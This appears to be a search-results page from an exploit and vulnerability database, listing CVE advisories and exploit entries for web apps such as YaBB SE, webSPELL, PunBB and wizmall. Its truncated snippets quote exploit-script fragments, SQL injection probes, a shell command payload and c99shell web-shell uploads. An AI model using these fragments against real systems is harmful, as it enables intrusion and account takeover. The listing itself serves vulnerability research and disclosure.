109 matches found
CVE-2024-22768 Hitron Systems DVR HVR-4781 Improper Input Validation Vulnerability
Improper Input Validation in Hitron Systems DVR HVR-4781 1.034.02 allows an attacker to cause network attack in case of using defalut admin ID/PW...
CVE-2023-4845
A vulnerability was found in SourceCodester Simple Membership System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file accounteditquery.php. The manipulation of the argument adminid leads to sql injection. The attack can be initiated remotely. The exploit...
PT-2023-30854 · Sourcecodester · Sourcecodester Simple Membership System
Name of the Vulnerable Software and Affected Versions: SourceCodester Simple Membership System version 1.0 Description: A critical vulnerability was found in the SourceCodester Simple Membership System. The issue affects the file account edit query.php, where the manipulation of the admin id...
fauzantrif eLection SQL Injection Vulnerability
fauzantrif eLection is a web-based election system. A SQL injection vulnerability exists in fauzantrif eLection 2.0. An attacker can exploit this vulnerability to achieve remote code execution via the admin/ajax/opkandidat.php id parameter...
Detrix EDMS 1.2.3.1505 - SQL Injection Vulnerability
Exploit for php platform in category web applications !/usr/bin/php / Exploit Title: Detrix EDMS cleartext user password remote SQLI exploit Google Dork: Date: Jul 2019 Exploit Author: Burov Konstantin Vendor Homepage: forum.detrix.kz Software Link:...
Groupon Clone Script 3.01 - catid SQL Injection
Groupon Clone Script 3.01 - catid SQL Injection Exploit Title: Groupon Clone Script v3.01 - SQL Injection Google Dork: N/A Date: 06.03.2017 Vendor Homepage: http://www.phpscriptsmall.com/ Software : http://www.phpscriptsmall.com/product/groupon-clone-script/ Demo:...
YaBB SE <= 1.5.5 - Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl YaBB SE version = 1.5.5 commands execution exploit by RST/GHC GUI version = THIS IS UNPUBLISHED RST/GHC EXPLOIT CODE KEEP IT PRIVATE coded by 1dt.w0lf http://rst.void.ru http://ghc.ru use Tk; use Tk::Menu; use LWP::UserAgent; $top = MainWindow-new...
wizmall 6.4 CSRF Vulnerabilities
Exploit for php platform in category web applications ================================ wizmall 6.4 CSRF Vulnerabilities ================================ Author: pyw1414 Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0 Version: 6.4 UTF-8 For php Tested on: XP SP3 -= CSRF...
wizmall 6.4 - Cross-Site Request Forgery
Exploit Title: wizmall 6.4 CSRF Vulnerabilities Date: 08/10/2010 Author: pyw1414 Software Link: http://www.shop-wiz.com/board/main/view/root/wizmall01/159/0 Version: 6.4 UTF-8 For php Tested on: XP SP3 -= CSRF Exploit - Change Admin ID/PW =- Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change...
Online Job Board - Authentication Bypass
Online Job Board - Authentication Bypass '/ -.- --------------------oOO------OOo----------------------------- | Online Job Board Auth Bypass SQL Injection Vulnerability | | works only with magicquotesgpc = off | ---------------------------------------------------------------- ! Discovered: cr4wl3...
Gravity Board X 2.0 Beta (Public Release 3) - SQL Injection
Gravity Board X 2.0 Beta Public Release 3 - SQL Injection !/usr/bin/perl Exploit Title: Gravity Board X 2.0 BETA Public Release 3 SQL INJECTION Date: 26.02.2010 Author: Ctacok Software Link: http://www.gravityboardx.com/ Version: 2.0 BETA Public Release 3 Tested on: Windows SP 3 Code : exploit co...
Pre Classified Listings Insecure Cookie Handling Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= IN THE NAME OF ALLAH -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Pre...
GLLCTS2 <= 4.2.4 (login.php detail) SQL Injection Exploit
No description provided by source. ?php settimelimit0; ignoreuserabort0; function addhtmlspace$count $out2 = strrepeat"",$count; return $out2; function writecontent$title,$desc,$content $out = "div class='content'div class='item'h1$title/h1div class='descr'$desc/divbrp$content/p/div"; return $out...
mumbojumbo-sql.txt
php '.$argv0.' http://www.site.com/cms/ 300 1 '; if $argc 1 printr' '; echo 'Searching for Admin: '; for$i=1; $i = 50; $i++ $temp1 = filegetcontents$argv1.'index.php?id='.$argv2.'+and+lengthselect+kennung+from+op4admin+where+id='.$argv3.'='.$i.'--'; if strpos$temp1,'Die angeforderte Seite existie...
YaBB SE 1.5.5 - Remote Command Execution
!/usr/bin/perl YaBB SE version new; $top-title"r57yabbse155ceGUI"; $top-resizable0,0; $url = 'http://server/forum/index.php'; $id = '1'; $cookiename = 'YaBBSE155'; $cmd = 'ls -la; id; uname -a;'; $button1text = 'Found admin ID'; $foundadminid = \ $stop = 0; $xpl = LWP::UserAgent-new or die;...
Alstrasoft Template Seller Pro 3.25 - Admin Password Change
Alstrasoft Template Seller Pro 3.25 - Admin Password Change !/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc4 echo "Usage: php ".$argv0." Host Path ID password Host: target server ip/hostname Path: path of template ID: A Valid Admin ID usally ...
PunBB 1.2.14 - Remote Code Execution
!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -usr -pwd Options Params: -url For example http://victim.com/punBB/ -usr User account 1 post at least -pwd Password account Options: -uid Admin id default=2...
webspell-exec.txt
!/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php... Options: -prefix Table prefix default=webs...
webSPELL <= 4.01.02 Remote PHP Code Execution Exploit
No description provided by source. !/usr/bin/php ?php errorreportingEALL ^ ENOTICE; Admin id: 1 Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5 Logged in wsauth=1%3A7b24afc8bc80e548d66c4e7ff72171c5 Trying to upload the malicious file Done http://localhost/webspell4.01.02/downloads/c99shell.php if$ar...
webSPELL 4.01.02 - PHP Remote Code Execution
webSPELL 4.01.02 - PHP Remote Code Execution !/usr/bin/php URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv0 -url -file Options Params: -url For example http://victim.com/webspell/ -file The file you wanna upload c99shell.php...